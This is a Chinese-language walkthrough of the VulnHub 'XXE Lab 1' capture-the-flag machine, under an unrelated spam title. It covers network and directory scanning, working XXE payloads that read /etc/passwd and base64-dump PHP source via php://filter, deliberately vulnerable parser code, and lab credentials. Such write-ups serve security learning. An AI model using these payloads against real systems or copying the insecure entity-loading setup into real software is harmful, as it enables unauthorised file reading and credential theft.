国家信息企业公示网查询官网_app软件程序开发_seo优化软件有哪些_百度一下百度主页度

下载地址

https://www.vulnhub.com/entry/xxe-lab-1,254/

扫描IP地址

nmap 192.168.112.0/24

扫描目录

dirb http://192.168.112.131/

访问一下robots.txt

得到了xxe/admin.php目录，来到了新页面

抓包

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd">]>
<root><name>&b;</name><password>asdadsad</password></root>

存在xxe，用户名叫r00t

尝试读取xxe.php源码

<!DOCTYPE a [<!ENTITY b SYSTEM "php://filter/read=convert.base64-
encode/resource=xxe.php">]>

base64解码

<?php
libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$info = simplexml_import_dom($dom);
$name = $info->name;
$password = $info->password;echo "Sorry, this $name not available!";
?>

解码admin.php进行代码审计

base64解码，得到用户名和密码

<?phpsession_start();
?><html lang = "en"><head><title>admin</title><link href = "css/bootstrap.min.css" rel = "stylesheet"><style>body {padding-top: 40px;padding-bottom: 40px;background-color: #ADABAB;}.form-signin {max-width: 330px;padding: 15px;margin: 0 auto;color: #017572;}.form-signin .form-signin-heading,.form-signin .checkbox {margin-bottom: 10px;}.form-signin .checkbox {font-weight: normal;}.form-signin .form-control {position: relative;height: auto;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;padding: 10px;font-size: 16px;}.form-signin .form-control:focus {z-index: 2;}.form-signin input[type="email"] {margin-bottom: -1px;border-bottom-right-radius: 0;border-bottom-left-radius: 0;border-color:#017572;}.form-signin input[type="password"] {margin-bottom: 10px;border-top-left-radius: 0;border-top-right-radius: 0;border-color:#017572;}h2{text-align: center;color: #017572;}</style></head><body><h2>Enter Username and Password</h2> <div class = "container form-signin"><?php$msg = '';if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {if ($_POST['username'] == 'administhebest' && md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {$_SESSION['valid'] = true;$_SESSION['timeout'] = time();$_SESSION['username'] = 'administhebest';echo "You have entered valid use name and password <br />";$flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";echo $flag;}else {$msg = 'Maybe Later';}}?></div> <!-- W00t/W00t --><div class = "container"><form class = "form-signin" role = "form" action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>" method = "post"><h4 class = "form-signin-heading"><?php echo $msg; ?></h4><input type = "text" class = "form-control" name = "username" required autofocus></br><input type = "password" class = "form-control"name = "password" required><button class = "btn btn-lg btn-primary btn-block" type = "submit" name = "login">Login</button></form>Click here to clean <a href = "adminlog.php" tite = "Logout">Session.</div> </body>
</html>

administhebest

admin@123

在admin.php目录中进行登录

在flagmeout.php的页面源代码中得到了flag

将flag放在cyberchef中进行解码

得到/etc/.flag.php

使用xxe漏洞访问这个目录/etc/.flag.php

base64解码

将解码结果放在php文件中并加上<?php标识符，进行访问即可得到flag